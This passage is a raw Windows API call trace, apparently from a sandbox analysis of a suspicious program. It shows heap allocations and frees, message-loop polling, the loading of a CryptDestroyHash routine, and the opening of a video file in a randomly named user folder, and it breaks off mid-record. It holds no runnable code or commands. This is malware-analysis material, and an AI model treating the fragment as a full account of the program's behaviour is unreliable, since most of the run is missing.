Size=0x214) returned 0x43e93c8 [0102.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0102.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0102.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0102.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0102.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0102.553] TranslateMessage (lpMsg=0x144e6a4) returned 0 [0102.553] DispatchMessageW (lpMsg=0x144e6a4) returned 0x0 [0102.553] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0102.553] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0102.554] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0102.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0102.554] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0102.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0102.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0102.554] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0102.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0102.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0102.554] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0102.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0102.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0102.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0102.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0102.554] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0102.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0102.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0102.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0102.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0102.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0102.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0102.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0102.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0102.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0102.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0102.555] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0102.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0102.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0102.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0102.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0102.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0102.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0102.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0102.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0102.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0102.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0102.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0102.556] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0102.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0102.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0102.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0102.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0102.556] CryptDestroyHash (hHash=0x41ac000) returned 1 [0102.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0102.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0102.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0102.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0102.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0102.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0102.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0102.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0102.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0102.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0102.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0102.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0102.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0102.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0102.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0102.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0102.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0102.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0102.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0102.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0102.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0102.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0102.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0102.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0102.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0102.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0102.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0102.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0102.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0102.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0102.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0102.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0102.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0102.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0102.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0102.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0102.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0102.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0102.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0102.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0102.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0102.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0102.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0102.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0102.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0102.558] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0102.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0102.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0102.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0102.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0102.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0102.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0102.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0102.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0102.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0102.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0102.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0102.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0102.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0102.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0102.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0102.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0102.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0102.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0102.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0102.561] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0102.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0102.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0102.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0102.561] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0102.561] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0102.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0102.561] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\s4MXeg0Vr.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\s4mxeg0vr.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0102.562] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.562] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0102.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0102.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0102.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0102.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0102.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0102.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0102.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0102.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0102.562] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0102.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0102.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0102.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0102.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0102.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0102.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0102.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0102.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0102.563] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0102.563] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0102.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0102.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0102.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0102.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0102.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0102.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0102.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0102.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0102.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0102.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0102.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0102.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0102.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0102.563] RtlAllocateHeap (HeapHandle=0x1780000, 